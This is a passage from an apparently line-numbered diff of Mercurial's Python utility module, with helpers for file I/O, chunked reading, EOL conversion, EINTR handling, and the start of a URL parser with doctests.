2257 makedir(name, notindexed)
2260 except OSError as err:
2258 except OSError as err:
2261 if err.errno == errno.EEXIST:
2259 if err.errno == errno.EEXIST:
2262 return
2260 return
2263 if err.errno != errno.ENOENT or not name:
2261 if err.errno != errno.ENOENT or not name:
2264 raise
2262 raise
2265 parent = os.path.dirname(os.path.abspath(name))
2263 parent = os.path.dirname(os.path.abspath(name))
2266 if parent == name:
2264 if parent == name:
2267 raise
2265 raise
2268 makedirs(parent, mode, notindexed)
2266 makedirs(parent, mode, notindexed)
2269 try:
2267 try:
2270 makedir(name, notindexed)
2268 makedir(name, notindexed)
2271 except OSError as err:
2269 except OSError as err:
2272 # Catch EEXIST to handle races
2270 # Catch EEXIST to handle races
2273 if err.errno == errno.EEXIST:
2271 if err.errno == errno.EEXIST:
2274 return
2272 return
2275 raise
2273 raise
2276 if mode is not None:
2274 if mode is not None:
2277 os.chmod(name, mode)
2275 os.chmod(name, mode)
2278
2276
2279 def readfile(path):
2277 def readfile(path):
2280 with open(path, 'rb') as fp:
2278 with open(path, 'rb') as fp:
2281 return fp.read()
2279 return fp.read()
2282
2280
2283 def writefile(path, text):
2281 def writefile(path, text):
2284 with open(path, 'wb') as fp:
2282 with open(path, 'wb') as fp:
2285 fp.write(text)
2283 fp.write(text)
2286
2284
2287 def appendfile(path, text):
2285 def appendfile(path, text):
2288 with open(path, 'ab') as fp:
2286 with open(path, 'ab') as fp:
2289 fp.write(text)
2287 fp.write(text)
2290
2288
2291 class chunkbuffer(object):
2289 class chunkbuffer(object):
2292 """Allow arbitrary sized chunks of data to be efficiently read from an
2290 """Allow arbitrary sized chunks of data to be efficiently read from an
2293 iterator over chunks of arbitrary size."""
2291 iterator over chunks of arbitrary size."""
2294
2292
2295 def __init__(self, in_iter):
2293 def __init__(self, in_iter):
2296 """in_iter is the iterator that's iterating over the input chunks."""
2294 """in_iter is the iterator that's iterating over the input chunks."""
2297 def splitbig(chunks):
2295 def splitbig(chunks):
2298 for chunk in chunks:
2296 for chunk in chunks:
2299 if len(chunk) > 2**20:
2297 if len(chunk) > 2**20:
2300 pos = 0
2298 pos = 0
2301 while pos < len(chunk):
2299 while pos < len(chunk):
2302 end = pos + 2 ** 18
2300 end = pos + 2 ** 18
2303 yield chunk[pos:end]
2301 yield chunk[pos:end]
2304 pos = end
2302 pos = end
2305 else:
2303 else:
2306 yield chunk
2304 yield chunk
2307 self.iter = splitbig(in_iter)
2305 self.iter = splitbig(in_iter)
2308 self._queue = collections.deque()
2306 self._queue = collections.deque()
2309 self._chunkoffset = 0
2307 self._chunkoffset = 0
2310
2308
2311 def read(self, l=None):
2309 def read(self, l=None):
2312 """Read L bytes of data from the iterator of chunks of data.
2310 """Read L bytes of data from the iterator of chunks of data.
2313 Returns less than L bytes if the iterator runs dry.
2311 Returns less than L bytes if the iterator runs dry.
2314
2312
2315 If size parameter is omitted, read everything"""
2313 If size parameter is omitted, read everything"""
2316 if l is None:
2314 if l is None:
2317 return ''.join(self.iter)
2315 return ''.join(self.iter)
2318
2316
2319 left = l
2317 left = l
2320 buf = []
2318 buf = []
2321 queue = self._queue
2319 queue = self._queue
2322 while left > 0:
2320 while left > 0:
2323 # refill the queue
2321 # refill the queue
2324 if not queue:
2322 if not queue:
2325 target = 2**18
2323 target = 2**18
2326 for chunk in self.iter:
2324 for chunk in self.iter:
2327 queue.append(chunk)
2325 queue.append(chunk)
2328 target -= len(chunk)
2326 target -= len(chunk)
2329 if target <= 0:
2327 if target <= 0:
2330 break
2328 break
2331 if not queue:
2329 if not queue:
2332 break
2330 break
2333
2331
2334 # The easy way to do this would be to queue.popleft(), modify the
2332 # The easy way to do this would be to queue.popleft(), modify the
2335 # chunk (if necessary), then queue.appendleft(). However, for cases
2333 # chunk (if necessary), then queue.appendleft(). However, for cases
2336 # where we read partial chunk content, this incurs 2 dequeue
2334 # where we read partial chunk content, this incurs 2 dequeue
2337 # mutations and creates a new str for the remaining chunk in the
2335 # mutations and creates a new str for the remaining chunk in the
2338 # queue. Our code below avoids this overhead.
2336 # queue. Our code below avoids this overhead.
2339
2337
2340 chunk = queue[0]
2338 chunk = queue[0]
2341 chunkl = len(chunk)
2339 chunkl = len(chunk)
2342 offset = self._chunkoffset
2340 offset = self._chunkoffset
2343
2341
2344 # Use full chunk.
2342 # Use full chunk.
2345 if offset == 0 and left >= chunkl:
2343 if offset == 0 and left >= chunkl:
2346 left -= chunkl
2344 left -= chunkl
2347 queue.popleft()
2345 queue.popleft()
2348 buf.append(chunk)
2346 buf.append(chunk)
2349 # self._chunkoffset remains at 0.
2347 # self._chunkoffset remains at 0.
2350 continue
2348 continue
2351
2349
2352 chunkremaining = chunkl - offset
2350 chunkremaining = chunkl - offset
2353
2351
2354 # Use all of unconsumed part of chunk.
2352 # Use all of unconsumed part of chunk.
2355 if left >= chunkremaining:
2353 if left >= chunkremaining:
2356 left -= chunkremaining
2354 left -= chunkremaining
2357 queue.popleft()
2355 queue.popleft()
2358 # offset == 0 is enabled by block above, so this won't merely
2356 # offset == 0 is enabled by block above, so this won't merely
2359 # copy via ``chunk[0:]``.
2357 # copy via ``chunk[0:]``.
2360 buf.append(chunk[offset:])
2358 buf.append(chunk[offset:])
2361 self._chunkoffset = 0
2359 self._chunkoffset = 0
2362
2360
2363 # Partial chunk needed.
2361 # Partial chunk needed.
2364 else:
2362 else:
2365 buf.append(chunk[offset:offset + left])
2363 buf.append(chunk[offset:offset + left])
2366 self._chunkoffset += left
2364 self._chunkoffset += left
2367 left -= chunkremaining
2365 left -= chunkremaining
2368
2366
2369 return ''.join(buf)
2367 return ''.join(buf)
2370
2368
2371 def filechunkiter(f, size=131072, limit=None):
2369 def filechunkiter(f, size=131072, limit=None):
2372 """Create a generator that produces the data in the file size
2370 """Create a generator that produces the data in the file size
2373 (default 131072) bytes at a time, up to optional limit (default is
2371 (default 131072) bytes at a time, up to optional limit (default is
2374 to read all data). Chunks may be less than size bytes if the
2372 to read all data). Chunks may be less than size bytes if the
2375 chunk is the last chunk in the file, or the file is a socket or
2373 chunk is the last chunk in the file, or the file is a socket or
2376 some other type of file that sometimes reads less data than is
2374 some other type of file that sometimes reads less data than is
2377 requested."""
2375 requested."""
2378 assert size >= 0
2376 assert size >= 0
2379 assert limit is None or limit >= 0
2377 assert limit is None or limit >= 0
2380 while True:
2378 while True:
2381 if limit is None:
2379 if limit is None:
2382 nbytes = size
2380 nbytes = size
2383 else:
2381 else:
2384 nbytes = min(limit, size)
2382 nbytes = min(limit, size)
2385 s = nbytes and f.read(nbytes)
2383 s = nbytes and f.read(nbytes)
2386 if not s:
2384 if not s:
2387 break
2385 break
2388 if limit:
2386 if limit:
2389 limit -= len(s)
2387 limit -= len(s)
2390 yield s
2388 yield s
2391
2389
2392 class cappedreader(object):
2390 class cappedreader(object):
2393 """A file object proxy that allows reading up to N bytes.
2391 """A file object proxy that allows reading up to N bytes.
2394
2392
2395 Given a source file object, instances of this type allow reading up to
2393 Given a source file object, instances of this type allow reading up to
2396 N bytes from that source file object. Attempts to read past the allowed
2394 N bytes from that source file object. Attempts to read past the allowed
2397 limit are treated as EOF.
2395 limit are treated as EOF.
2398
2396
2399 It is assumed that I/O is not performed on the original file object
2397 It is assumed that I/O is not performed on the original file object
2400 in addition to I/O that is performed by this instance. If there is,
2398 in addition to I/O that is performed by this instance. If there is,
2401 state tracking will get out of sync and unexpected results will ensue.
2399 state tracking will get out of sync and unexpected results will ensue.
2402 """
2400 """
2403 def __init__(self, fh, limit):
2401 def __init__(self, fh, limit):
2404 """Allow reading up to <limit> bytes from <fh>."""
2402 """Allow reading up to <limit> bytes from <fh>."""
2405 self._fh = fh
2403 self._fh = fh
2406 self._left = limit
2404 self._left = limit
2407
2405
2408 def read(self, n=-1):
2406 def read(self, n=-1):
2409 if not self._left:
2407 if not self._left:
2410 return b''
2408 return b''
2411
2409
2412 if n < 0:
2410 if n < 0:
2413 n = self._left
2411 n = self._left
2414
2412
2415 data = self._fh.read(min(n, self._left))
2413 data = self._fh.read(min(n, self._left))
2416 self._left -= len(data)
2414 self._left -= len(data)
2417 assert self._left >= 0
2415 assert self._left >= 0
2418
2416
2419 return data
2417 return data
2420
2418
2421 def readinto(self, b):
2419 def readinto(self, b):
2422 res = self.read(len(b))
2420 res = self.read(len(b))
2423 if res is None:
2421 if res is None:
2424 return None
2422 return None
2425
2423
2426 b[0:len(res)] = res
2424 b[0:len(res)] = res
2427 return len(res)
2425 return len(res)
2428
2426
2429 def unitcountfn(*unittable):
2427 def unitcountfn(*unittable):
2430 '''return a function that renders a readable count of some quantity'''
2428 '''return a function that renders a readable count of some quantity'''
2431
2429
2432 def go(count):
2430 def go(count):
2433 for multiplier, divisor, format in unittable:
2431 for multiplier, divisor, format in unittable:
2434 if abs(count) >= divisor * multiplier:
2432 if abs(count) >= divisor * multiplier:
2435 return format % (count / float(divisor))
2433 return format % (count / float(divisor))
2436 return unittable[-1][2] % count
2434 return unittable[-1][2] % count
2437
2435
2438 return go
2436 return go
2439
2437
2440 def processlinerange(fromline, toline):
2438 def processlinerange(fromline, toline):
2441 """Check that linerange <fromline>:<toline> makes sense and return a
2439 """Check that linerange <fromline>:<toline> makes sense and return a
2442 0-based range.
2440 0-based range.
2443
2441
2444 >>> processlinerange(10, 20)
2442 >>> processlinerange(10, 20)
2445 (9, 20)
2443 (9, 20)
2446 >>> processlinerange(2, 1)
2444 >>> processlinerange(2, 1)
2447 Traceback (most recent call last):
2445 Traceback (most recent call last):
2448 ...
2446 ...
2449 ParseError: line range must be positive
2447 ParseError: line range must be positive
2450 >>> processlinerange(0, 5)
2448 >>> processlinerange(0, 5)
2451 Traceback (most recent call last):
2449 Traceback (most recent call last):
2452 ...
2450 ...
2453 ParseError: fromline must be strictly positive
2451 ParseError: fromline must be strictly positive
2454 """
2452 """
2455 if toline - fromline < 0:
2453 if toline - fromline < 0:
2456 raise error.ParseError(_("line range must be positive"))
2454 raise error.ParseError(_("line range must be positive"))
2457 if fromline < 1:
2455 if fromline < 1:
2458 raise error.ParseError(_("fromline must be strictly positive"))
2456 raise error.ParseError(_("fromline must be strictly positive"))
2459 return fromline - 1, toline
2457 return fromline - 1, toline
2460
2458
2461 bytecount = unitcountfn(
2459 bytecount = unitcountfn(
2462 (100, 1 << 30, _('%.0f GB')),
2460 (100, 1 << 30, _('%.0f GB')),
2463 (10, 1 << 30, _('%.1f GB')),
2461 (10, 1 << 30, _('%.1f GB')),
2464 (1, 1 << 30, _('%.2f GB')),
2462 (1, 1 << 30, _('%.2f GB')),
2465 (100, 1 << 20, _('%.0f MB')),
2463 (100, 1 << 20, _('%.0f MB')),
2466 (10, 1 << 20, _('%.1f MB')),
2464 (10, 1 << 20, _('%.1f MB')),
2467 (1, 1 << 20, _('%.2f MB')),
2465 (1, 1 << 20, _('%.2f MB')),
2468 (100, 1 << 10, _('%.0f KB')),
2466 (100, 1 << 10, _('%.0f KB')),
2469 (10, 1 << 10, _('%.1f KB')),
2467 (10, 1 << 10, _('%.1f KB')),
2470 (1, 1 << 10, _('%.2f KB')),
2468 (1, 1 << 10, _('%.2f KB')),
2471 (1, 1, _('%.0f bytes')),
2469 (1, 1, _('%.0f bytes')),
2472 )
2470 )
2473
2471
2474 class transformingwriter(object):
2472 class transformingwriter(object):
2475 """Writable file wrapper to transform data by function"""
2473 """Writable file wrapper to transform data by function"""
2476
2474
2477 def __init__(self, fp, encode):
2475 def __init__(self, fp, encode):
2478 self._fp = fp
2476 self._fp = fp
2479 self._encode = encode
2477 self._encode = encode
2480
2478
2481 def close(self):
2479 def close(self):
2482 self._fp.close()
2480 self._fp.close()
2483
2481
2484 def flush(self):
2482 def flush(self):
2485 self._fp.flush()
2483 self._fp.flush()
2486
2484
2487 def write(self, data):
2485 def write(self, data):
2488 return self._fp.write(self._encode(data))
2486 return self._fp.write(self._encode(data))
2489
2487
2490 # Matches a single EOL which can either be a CRLF where repeated CR
2488 # Matches a single EOL which can either be a CRLF where repeated CR
2491 # are removed or a LF. We do not care about old Macintosh files, so a
2489 # are removed or a LF. We do not care about old Macintosh files, so a
2492 # stray CR is an error.
2490 # stray CR is an error.
2493 _eolre = remod.compile(br'\r*\n')
2491 _eolre = remod.compile(br'\r*\n')
2494
2492
2495 def tolf(s):
2493 def tolf(s):
2496 return _eolre.sub('\n', s)
2494 return _eolre.sub('\n', s)
2497
2495
2498 def tocrlf(s):
2496 def tocrlf(s):
2499 return _eolre.sub('\r\n', s)
2497 return _eolre.sub('\r\n', s)
2500
2498
2501 def _crlfwriter(fp):
2499 def _crlfwriter(fp):
2502 return transformingwriter(fp, tocrlf)
2500 return transformingwriter(fp, tocrlf)
2503
2501
2504 if pycompat.oslinesep == '\r\n':
2502 if pycompat.oslinesep == '\r\n':
2505 tonativeeol = tocrlf
2503 tonativeeol = tocrlf
2506 fromnativeeol = tolf
2504 fromnativeeol = tolf
2507 nativeeolwriter = _crlfwriter
2505 nativeeolwriter = _crlfwriter
2508 else:
2506 else:
2509 tonativeeol = pycompat.identity
2507 tonativeeol = pycompat.identity
2510 fromnativeeol = pycompat.identity
2508 fromnativeeol = pycompat.identity
2511 nativeeolwriter = pycompat.identity
2509 nativeeolwriter = pycompat.identity
2512
2510
2513 if (pyplatform.python_implementation() == 'CPython' and
2511 if (pyplatform.python_implementation() == 'CPython' and
2514 sys.version_info < (3, 0)):
2512 sys.version_info < (3, 0)):
2515 # There is an issue in CPython that some IO methods do not handle EINTR
2513 # There is an issue in CPython that some IO methods do not handle EINTR
2516 # correctly. The following table shows what CPython version (and functions)
2514 # correctly. The following table shows what CPython version (and functions)
2517 # are affected (buggy: has the EINTR bug, okay: otherwise):
2515 # are affected (buggy: has the EINTR bug, okay: otherwise):
2518 #
2516 #
2519 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2517 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2520 # --------------------------------------------------
2518 # --------------------------------------------------
2521 # fp.__iter__ | buggy | buggy | okay
2519 # fp.__iter__ | buggy | buggy | okay
2522 # fp.read* | buggy | okay [1] | okay
2520 # fp.read* | buggy | okay [1] | okay
2523 #
2521 #
2524 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2522 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2525 #
2523 #
2526 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2524 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2527 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2525 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2528 #
2526 #
2529 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2527 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2530 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2528 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2531 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2529 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2532 # fp.__iter__ but not other fp.read* methods.
2530 # fp.__iter__ but not other fp.read* methods.
2533 #
2531 #
2534 # On modern systems like Linux, the "read" syscall cannot be interrupted
2532 # On modern systems like Linux, the "read" syscall cannot be interrupted
2535 # when reading "fast" files like on-disk files. So the EINTR issue only
2533 # when reading "fast" files like on-disk files. So the EINTR issue only
2536 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2534 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2537 # files approximately as "fast" files and use the fast (unsafe) code path,
2535 # files approximately as "fast" files and use the fast (unsafe) code path,
2538 # to minimize the performance impact.
2536 # to minimize the performance impact.
2539 if sys.version_info >= (2, 7, 4):
2537 if sys.version_info >= (2, 7, 4):
2540 # fp.readline deals with EINTR correctly, use it as a workaround.
2538 # fp.readline deals with EINTR correctly, use it as a workaround.
2541 def _safeiterfile(fp):
2539 def _safeiterfile(fp):
2542 return iter(fp.readline, '')
2540 return iter(fp.readline, '')
2543 else:
2541 else:
2544 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2542 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2545 # note: this may block longer than necessary because of bufsize.
2543 # note: this may block longer than necessary because of bufsize.
2546 def _safeiterfile(fp, bufsize=4096):
2544 def _safeiterfile(fp, bufsize=4096):
2547 fd = fp.fileno()
2545 fd = fp.fileno()
2548 line = ''
2546 line = ''
2549 while True:
2547 while True:
2550 try:
2548 try:
2551 buf = os.read(fd, bufsize)
2549 buf = os.read(fd, bufsize)
2552 except OSError as ex:
2550 except OSError as ex:
2553 # os.read only raises EINTR before any data is read
2551 # os.read only raises EINTR before any data is read
2554 if ex.errno == errno.EINTR:
2552 if ex.errno == errno.EINTR:
2555 continue
2553 continue
2556 else:
2554 else:
2557 raise
2555 raise
2558 line += buf
2556 line += buf
2559 if '\n' in buf:
2557 if '\n' in buf:
2560 splitted = line.splitlines(True)
2558 splitted = line.splitlines(True)
2561 line = ''
2559 line = ''
2562 for l in splitted:
2560 for l in splitted:
2563 if l[-1] == '\n':
2561 if l[-1] == '\n':
2564 yield l
2562 yield l
2565 else:
2563 else:
2566 line = l
2564 line = l
2567 if not buf:
2565 if not buf:
2568 break
2566 break
2569 if line:
2567 if line:
2570 yield line
2568 yield line
2571
2569
2572 def iterfile(fp):
2570 def iterfile(fp):
2573 fastpath = True
2571 fastpath = True
2574 if type(fp) is file:
2572 if type(fp) is file:
2575 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2573 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2576 if fastpath:
2574 if fastpath:
2577 return fp
2575 return fp
2578 else:
2576 else:
2579 return _safeiterfile(fp)
2577 return _safeiterfile(fp)
2580 else:
2578 else:
2581 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2579 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2582 def iterfile(fp):
2580 def iterfile(fp):
2583 return fp
2581 return fp
2584
2582
2585 def iterlines(iterator):
2583 def iterlines(iterator):
2586 for chunk in iterator:
2584 for chunk in iterator:
2587 for line in chunk.splitlines():
2585 for line in chunk.splitlines():
2588 yield line
2586 yield line
2589
2587
2590 def expandpath(path):
2588 def expandpath(path):
2591 return os.path.expanduser(os.path.expandvars(path))
2589 return os.path.expanduser(os.path.expandvars(path))
2592
2590
2593 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2591 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2594 """Return the result of interpolating items in the mapping into string s.
2592 """Return the result of interpolating items in the mapping into string s.
2595
2593
2596 prefix is a single character string, or a two character string with
2594 prefix is a single character string, or a two character string with
2597 a backslash as the first character if the prefix needs to be escaped in
2595 a backslash as the first character if the prefix needs to be escaped in
2598 a regular expression.
2596 a regular expression.
2599
2597
2600 fn is an optional function that will be applied to the replacement text
2598 fn is an optional function that will be applied to the replacement text
2601 just before replacement.
2599 just before replacement.
2602
2600
2603 escape_prefix is an optional flag that allows using doubled prefix for
2601 escape_prefix is an optional flag that allows using doubled prefix for
2604 its escaping.
2602 its escaping.
2605 """
2603 """
2606 fn = fn or (lambda s: s)
2604 fn = fn or (lambda s: s)
2607 patterns = '|'.join(mapping.keys())
2605 patterns = '|'.join(mapping.keys())
2608 if escape_prefix:
2606 if escape_prefix:
2609 patterns += '|' + prefix
2607 patterns += '|' + prefix
2610 if len(prefix) > 1:
2608 if len(prefix) > 1:
2611 prefix_char = prefix[1:]
2609 prefix_char = prefix[1:]
2612 else:
2610 else:
2613 prefix_char = prefix
2611 prefix_char = prefix
2614 mapping[prefix_char] = prefix_char
2612 mapping[prefix_char] = prefix_char
2615 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2613 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2616 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2614 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2617
2615
2618 def getport(port):
2616 def getport(port):
2619 """Return the port for a given network service.
2617 """Return the port for a given network service.
2620
2618
2621 If port is an integer, it's returned as is. If it's a string, it's
2619 If port is an integer, it's returned as is. If it's a string, it's
2622 looked up using socket.getservbyname(). If there's no matching
2620 looked up using socket.getservbyname(). If there's no matching
2623 service, error.Abort is raised.
2621 service, error.Abort is raised.
2624 """
2622 """
2625 try:
2623 try:
2626 return int(port)
2624 return int(port)
2627 except ValueError:
2625 except ValueError:
2628 pass
2626 pass
2629
2627
2630 try:
2628 try:
2631 return socket.getservbyname(pycompat.sysstr(port))
2629 return socket.getservbyname(pycompat.sysstr(port))
2632 except socket.error:
2630 except socket.error:
2633 raise error.Abort(_("no port number associated with service '%s'")
2631 raise error.Abort(_("no port number associated with service '%s'")
2634 % port)
2632 % port)
2635
2633
2636 class url(object):
2634 class url(object):
2637 r"""Reliable URL parser.
2635 r"""Reliable URL parser.
2638
2636
2639 This parses URLs and provides attributes for the following
2637 This parses URLs and provides attributes for the following
2640 components:
2638 components:
2641
2639
2642 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2640 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2643
2641
2644 Missing components are set to None. The only exception is
2642 Missing components are set to None. The only exception is
2645 fragment, which is set to '' if present but empty.
2643 fragment, which is set to '' if present but empty.
2646
2644
2647 If parsefragment is False, fragment is included in query. If
2645 If parsefragment is False, fragment is included in query. If
2648 parsequery is False, query is included in path. If both are
2646 parsequery is False, query is included in path. If both are
2649 False, both fragment and query are included in path.
2647 False, both fragment and query are included in path.
2650
2648
2651 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2649 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2652
2650
2653 Note that for backward compatibility reasons, bundle URLs do not
2651 Note that for backward compatibility reasons, bundle URLs do not
2654 take host names. That means 'bundle://../' has a path of '../'.
2652 take host names. That means 'bundle://../' has a path of '../'.
2655
2653
2656 Examples:
2654 Examples:
2657
2655
2658 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2656 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2659 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2657 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2660 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2658 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2661 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2659 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2662 >>> url(b'file:///home/joe/repo')
2660 >>> url(b'file:///home/joe/repo')
2663 <url scheme: 'file', path: '/home/joe/repo'>
2661 <url scheme: 'file', path: '/home/joe/repo'>
2664 >>> url(b'file:///c:/temp/foo/')
2662 >>> url(b'file:///c:/temp/foo/')
2665 <url scheme: 'file', path: 'c:/temp/foo/'>
2663 <url scheme: 'file', path: 'c:/temp/foo/'>
2666 >>> url(b'bundle:foo')
2664 >>> url(b'bundle:foo')
2667 <url scheme: 'bundle', path: 'foo'>
2665 <url scheme: 'bundle', path: 'foo'>
2668 >>> url(b'bundle://../foo')
2666 >>> url(b'bundle://../foo')
2669 <url scheme: 'bundle', path: '../foo'>
2667 <url scheme: 'bundle', path: '../foo'>
2670 >>> url(br'c:\foo\bar')
2668 >>> url(br'c:\foo\bar')
2671 <url path: 'c:\\foo\\bar'>
2669 <url path: 'c:\\foo\\bar'>
2672 >>> url(br'\\blah\blah\blah')
2670 >>> url(br'\\blah\blah\blah')
2673 <url path: '\\\\blah\\blah\\blah'>
2671 <url path: '\\\\blah\\blah\\blah'>
2674 >>> url(br'\\blah\blah\blah#baz')
2672 >>> url(br'\\blah\blah\blah#baz')
2675 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2673 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2676 >>> url(br'file:///C:\users\me')
2674 >>> url(br'file:///C:\users\me')
2677 <url scheme: 'file', path: 'C:\\users\\me'>
2675 <url scheme: 'file', path: 'C:\\users\\me'>
2678
2676
2679 Authentication credentials:
2677 Authentication credentials:
2680
2678
2681 >>> url(b'ssh://joe:xyz@x/repo')
2679 >>> url(b'ssh://joe:xyz@x/repo')
2682 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2680 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2683 >>> url(b'ssh://joe@x/repo')
2681 >>> url(b'ssh://joe@x/repo')
2684 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2682 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2685
2683
2686 Query strings and fragments:
2684 Query strings and fragments:
2687
2685
2688 >>> url(b'http://host/a?b#c')
2686 >>> url(b'http://host/a?b#c')
2689 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2687 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2690 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2688 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2691 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2689 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2692
2690
2693 Empty path:
2691 Empty path:
2694
2692
2695 >>> url(b'')
2693 >>> url(b'')
2696 <url path: ''>
2694 <url path: ''>
2697 >>> url(b'#a')
2695 >>> url(b'#a')
2698 <url path: '', fragment: 'a'>
2696 <url path: '', fragment: 'a'>
2699 >>> url(b'http://host/')
2697 >>> url(b'http://host/')
2700 <url scheme: 'http', host: 'host', path: ''>
2698 <url scheme: 'http', host: 'host', path: ''>
2701 >>> url(b'http://host/#a')
2699 >>> url(b'http://host/#a')
2702 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2700 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2703
2701
2704 Only scheme:
2702 Only scheme:
2705
2703
2706 >>> url(b'http:')
2704 >>> url(b'http:')
2707 <url scheme: 'http'>
2705 <url scheme: 'http'>
2708 """
2706 """
2709
2707
2710 _safechars = "!~*'()+"
2708 _safechars = "!~*'()+"
2711 _safepchars = "/!~*'()+:\\"
2709 _safepchars = "/!~*'()+:\\"
2712 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2710 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2713
2711
2714 def __init__(self, path, parsequery=True, parsefragment=True):
2712 def __init__(self, path, parsequery=True, parsefragment=True):
2715 # We slowly chomp away at path until we have only the path left
2713 # We slowly chomp away at path until we have only the path left
2716 self.scheme = self.user = self.passwd = self.host = None
2714 self.scheme = self.user = self.passwd = self.host = None
2717 self.port = self.path = self.query = self.fragment = None
2715 self.port = self.path = self.query = self.fragment = None
2718 self._localpath = True
2716 self._localpath = True
2719 self._hostport = ''
2717 self._hostport = ''
2720 self._origpath = path
2718 self._origpath = path
2721
2719
2722 if parsefragment and '#' in path:
2720 if parsefragment and '#' in path:
2723 path, self.fragment = path.split('#', 1)
2721 path, self.fragment = path.split('#', 1)
2724
2722
2725 # special case for Windows drive letters and UNC paths
2723 # special case for Windows drive letters and UNC paths
2726 if hasdriveletter(path) or path.startswith('\\\\'):
2724 if hasdriveletter(path) or path.startswith('\\\\'):
2727 self.path = path
2725 self.path = path
2728 return
2726 return
2729
2727
2730 # For compatibility reasons, we can't handle bundle paths as
2728 # For compatibility reasons, we can't handle bundle paths as
2731 # normal URLS
2729 # normal URLS
2732 if path.startswith('bundle:'):
2730 if path.startswith('bundle:'):
2733 self.scheme = 'bundle'
2731 self.scheme = 'bundle'
2734 path = path[7:]
2732 path = path[7:]
2735 if path.startswith('//'):
2733 if path.startswith('//'):
2736 path = path[2:]
2734 path = path[2:]
2737 self.path = path
2735 self.path = path
2738 return
2736 return
2739
2737
2740 if self._matchscheme(path):
2738 if self._matchscheme(path):
2741 parts = path.split(':', 1)
2739 parts = path.split(':', 1)
2742 if parts[0]:
2740 if parts[0]:
2743 self.scheme, path = parts
2741 self.scheme, path = parts
2744 self._localpath = False
2742 self._localpath = False
2745
2743
2746 if not path:
2744 if not path:
2747 path = None
2745 path = None
2748 if self._localpath:
2746 if self._localpath:
2749 self.path = ''
2747 self.path = ''
2750 return
2748 return
2751 else:
2749 else:
2752 if self._localpath:
2750 if self._localpath:
2753 self.path = path
2751 self.path = path
2754 return
2752 return
2755
2753
2756 if parsequery and '?' in path:
2754 if parsequery and '?' in path:
2757 path, self.query = path.split('?', 1)
2755 path, self.query = path.split('?', 1)
2758 if not path:
2756 if not path:
2759 path = None
2757 path = None
2760 if not self.query:
2758 if not self.query:
2761 self.query = None
2759 self.query = None
2762
2760
2763 # // is required to specify a host/authority
2761 # // is required to specify a host/authority
2764 if path and path.startswith('//'):
2762 if path and path.startswith('//'):
2765 parts = path[2:].split('/', 1)
2763 parts = path[2:].split('/', 1)
2766 if len(parts) > 1:
2764 if len(parts) > 1:
2767 self.host, path = parts
2765 self.host, path = parts
2768 else:
2766 else:
2769 self.host = parts[0]
2767 self.host = parts[0]
2770 path = None
2768 path = None
2771 if not self.host:
2769 if not self.host:
2772 self.host = None
2770 self.host = None
2773 # path of file:///d is /d
2771 # path of file:///d is /d
2774 # path of file:///d:/ is d:/, not /d:/
2772 # path of file:///d:/ is d:/, not /d:/
2775 if path and not hasdriveletter(path):
2773 if path and not hasdriveletter(path):
2776 path = '/' + path
2774 path = '/' + path
2777
2775
2778 if self.host and '@' in self.host:
2776 if self.host and '@' in self.host:
2779 self.user, self.host = self.host.rsplit('@', 1)
2777 self.user, self.host = self.host.rsplit('@', 1)
2780 if ':' in self.user:
